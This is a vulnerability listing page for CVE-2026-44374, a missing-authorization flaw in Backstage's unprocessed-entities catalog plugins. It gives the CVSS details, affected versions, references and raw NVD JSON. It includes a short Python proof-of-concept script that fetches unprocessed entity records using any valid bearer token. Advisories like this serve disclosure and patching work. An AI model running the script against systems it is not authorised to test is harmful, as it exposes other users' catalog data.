CVE-2026-44374

Description

Backstage is an open framework for building developer portals. Prior to 0.6.11, the unprocessed entities read endpoints in @backstage/plugin-catalog-backend-module-unprocessed do not enforce permission authorization checks. Any authenticated user can access unprocessed entity records regardless of ownership. This is an information disclosure vulnerability affecting Backstage installations using this module. This is patched in @backstage/plugin-catalog-backend-module-unprocessed version 0.6.11, @backstage/plugin-catalog-unprocessed-entities-common version 0.0.15 and @backstage/plugin-catalog-unprocessed-entities version 0.2.30.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

@backstage/plugin-catalog-backend-module-unprocessed < 0.6.11

@backstage/plugin-catalog-unprocessed-entities-common < 0.0.15

@backstage/plugin-catalog-unprocessed-entities < 0.2.30

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-44374: Backstage Information Disclosure
# This script demonstrates unauthorized access to unprocessed entities.

import requests

def check_vulnerability(target_url, auth_token):
    # The endpoint that is vulnerable
    endpoint = "/api/catalog/unprocessed-entities"
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json"
    }
    
    try:
        response = requests.get(target_url + endpoint, headers=headers)
        if response.status_code == 200:
            print("[+] Vulnerability confirmed! Data retrieved:")
            print(response.text)
        else:
            print(f"[-] Failed to retrieve data. Status: {response.status_code}")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

# Usage
# check_vulnerability("http://localhost:7007", "<YOUR_VALID_TOKEN>")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44374
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44374
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44374/
[4] VulDB https://vuldb.com/cve/CVE-2026-44374
[5] https://github.com/backstage/backstage/security/advisories/GHSA-p7g9-rp3g-mgfg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44374", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:48.250", "lastModified": "2026-05-14T18:17:11.253", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Backstage is an open framework for building developer portals. Prior to 0.6.11, the unprocessed entities read endpoints in @backstage/plugin-catalog-backend-module-unprocessed do not enforce permission authorization checks. Any authenticated user can access unprocessed entity records regardless of ownership. This is an information disclosure vulnerability affecting Backstage installations using this module. This is patched in @backstage/plugin-catalog-backend-module-unprocessed version 0.6.11, @backstage/plugin-catalog-unprocessed-entities-common version 0.0.15 and @backstage/plugin-catalog-unprocessed-entities version 0.2.30."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/backstage/backstage/security/advisories/GHSA-p7g9-rp3g-mgfg", "source": "[email protected]"}]}}